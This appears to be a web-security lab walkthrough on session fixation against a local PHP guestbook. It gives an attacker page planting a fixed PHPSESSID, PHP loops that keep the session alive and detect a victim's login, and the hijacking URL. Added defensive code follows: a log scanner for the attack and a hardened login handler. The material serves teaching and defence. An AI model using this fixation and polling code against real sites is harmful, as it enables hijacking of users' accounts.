- Write a program that connects to the page of your guestbook and stores the Session ID (you can also do it directly with telnet and note the Session ID by hand).
GET /WebSecurity/examples/guestbook/ HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Date: Tue, 24 Jun 2008 14:03:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1863
Content-Type: text/html
<link rel="stylesheet" type="text/css" href="guestbook.css"/>
We have obtained the Session ID e1e32bd7733f7d44811d0655f12b30b6 from the Set-Cookie header.
- On your HTTPS server, create a new page (it plays the role of the attacker's web page).
This page contains only a Hello World and a reference to an external resource (image, javascript, ...).
In reality, this reference points to the homepage of your guestbook and carries the session ID stored in the previous step.
helloWorld.php
<h1>Hello World</h1>
<a href="http://localhost/WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6">Start the Guest Book</a>
- Write another program that keeps your session alive (it sends requests containing the session ID to the server at regular intervals).
Your program should raise an alert when the user has logged in (to do this, look for a sentence that does not normally appear on the guestbook page).
The following program does this job:
It is an endless loop that sends a request containing the Session ID to the server at regular intervals (every 30 s), so the session remains alive.
<?php
// Guestbook homepage, with the fixed session ID passed in the query string
$url="http://localhost/WebSecurity/examples/guestbook/index.php";
$url.="?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6";
while(1){
echo "Sending Request\n";
$fh = fopen($url,'r'); // one GET is enough to refresh the session's last-activity time
fclose($fh);
sleep(30);             // wait less than the server's session lifetime
}
?>
If you want to test whether the user is logged in, test for the presence of the title (h2) "Modify your password", which the guestbook only shows to a logged-in user.
<?php
$url="http://localhost/WebSecurity/examples/guestbook/index.php";
$url.="?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6";
while(1){
echo "Sending Request\n";
$fh = fopen($url,'r');
$loggedIn=0;
// Scan the response line by line for the title only a logged-in user sees
while($theData = fgets($fh)){
if (preg_match('|<h2>Modify your Password</h2>|i',$theData)){
$loggedIn=1;
}
}
if($loggedIn){
echo "------------ Logged IN ----------\n";
}
else{
echo "Not yet\n";
}
fclose($fh);
sleep(10);
}
?>
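From the defender's side, the traffic generated by the keep-alive program above leaves two clear marks in the web server's access log: the session ID travels in the query string, and the same session ID is later used from a second client address (the victim's browser). The following PHP script is an added example, not part of the lab; it parses Apache "combined" log lines (constructed here for the example) and reports both indicators. The log format, field names and the `analyse()` function are assumptions of this example.

```php
<?php
// Added example: scan Apache "combined" access-log lines for two
// session-fixation indicators:
//   1. a session ID passed in the query string (PHPSESSID=...), and
//   2. one session ID used from more than one client IP.
// The log lines below are constructed for this example.

$logLines = [
    '10.0.0.5 - - [24/Jun/2008:14:03:55 +0000] "GET /WebSecurity/examples/guestbook/ HTTP/1.1" 200 1863 "-" "curl/7.18"',
    '10.0.0.5 - - [24/Jun/2008:14:04:25 +0000] "GET /WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6 HTTP/1.1" 200 1863 "-" "PHP"',
    '10.0.0.5 - - [24/Jun/2008:14:04:55 +0000] "GET /WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6 HTTP/1.1" 200 1863 "-" "PHP"',
    '192.168.1.20 - - [24/Jun/2008:14:05:10 +0000] "GET /WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6 HTTP/1.1" 200 2210 "https://attacker.example/helloWorld.php" "Mozilla/5.0"',
    '192.168.1.21 - - [24/Jun/2008:14:05:30 +0000] "GET /WebSecurity/examples/guestbook/index.php HTTP/1.1" 200 1863 "-" "Mozilla/5.0"',
];

// Parse one combined-format line into its fields; returns null if it does not match.
function parseLogLine(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int)$m[5], 'referer' => $m[6], 'ua' => $m[7]];
}

// Extract a PHPSESSID carried in the query string, or null if there is none.
function sessionIdFromUrl(string $path): ?string {
    $query = parse_url($path, PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return null;
    }
    parse_str($query, $params);
    return isset($params['PHPSESSID']) ? (string)$params['PHPSESSID'] : null;
}

// Returns the findings as an array so they can be handed to any alerting pipeline.
function analyse(array $lines): array {
    $findings = [];
    $ipsBySession = [];
    foreach ($lines as $line) {
        $req = parseLogLine($line);
        if ($req === null) {
            continue;
        }
        $sid = sessionIdFromUrl($req['path']);
        if ($sid === null) {
            continue;
        }
        // Indicator 1: session ID in the URL (the server should not honour it at all)
        $findings[] = sprintf('%s %s session ID in URL: %s', $req['time'], $req['ip'], $sid);
        $ipsBySession[$sid][$req['ip']] = true;
    }
    // Indicator 2: the same session ID seen from several client addresses
    foreach ($ipsBySession as $sid => $ips) {
        if (count($ips) > 1) {
            $findings[] = sprintf('session %s used from %d client IPs: %s',
                                  $sid, count($ips), implode(', ', array_keys($ips)));
        }
    }
    return $findings;
}

foreach (analyse($logLines) as $f) {
    echo $f, "\n";
}
```

On the constructed input the script reports three "session ID in URL" lines and one "used from 2 client IPs" line for session e1e32bd7733f7d44811d0655f12b30b6. The second indicator is the one worth paging on: a session ID in the URL alone may just be a misconfigured client, but one session shared by two addresses, one of which polls at a fixed interval, matches the keep-alive pattern exactly.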
- The attacker then simply needs to put the session ID in the URL (disable cookies in the browser you use for the attack):
http://localhost/WebSecurity/examples/guestbook/index.php?PHPSESSID=e1e32bd7733f7d44811d0655f12b30b6
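The attack works only because the guestbook accepts a session ID chosen by the client (from the URL) and keeps that same ID after the user logs in. The following login handler is an added example, not the lab's guestbook code, showing the server-side settings that close both gaps: session IDs are accepted from cookies only, unknown IDs are rejected, and the ID is regenerated at login. It assumes PHP 7 or later; `verifyCredentials()` is a placeholder for the application's own password check.

```php
<?php
// Added example: a login handler hardened against session fixation.
// verifyCredentials() is a placeholder for the guestbook's own check.

// 1. Never accept a session ID from the URL and never rewrite links to
//    carry PHPSESSID. These must be set before session_start().
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Reject IDs the server did not itself create (available since PHP 5.5.2).
ini_set('session.use_strict_mode', '1');
// lifetime, path, domain, secure, httponly: keep the cookie off plain HTTP and away from scripts
session_set_cookie_params(0, '/', '', true, true);

// 2. With use_only_cookies a PHPSESSID in the query string is ignored, so it
//    is only an indicator; record it so the detection above has something to find.
if (isset($_GET['PHPSESSID'])) {
    error_log('session ID supplied in URL from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
}

session_start();

function verifyCredentials(string $user, string $password): bool {
    // placeholder: the real guestbook checks its own user table
    return $user === 'alice' && $password === 'correct horse battery staple';
}

function login(string $user, string $password): bool {
    if (!verifyCredentials($user, $password)) {
        return false;
    }
    // 3. The decisive step: issue a fresh ID at the privilege change and
    //    delete the old session file, so an ID planted before login is
    //    never associated with the logged-in state.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
    $_SESSION['login_ip'] = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
    return true;
}

function logout(): void {
    $_SESSION = [];
    session_destroy();
}

if (isset($_POST['user'], $_POST['password'])) {
    echo login($_POST['user'], $_POST['password']) ? 'Logged in' : 'Login failed';
}
```

With these settings the lab's steps fail in order: the link on helloWorld.php no longer fixes the session, the keep-alive program is refreshing a session that is never tied to a user, and even if an ID did leak, `session_regenerate_id(true)` at login leaves the attacker holding a value the server has already discarded.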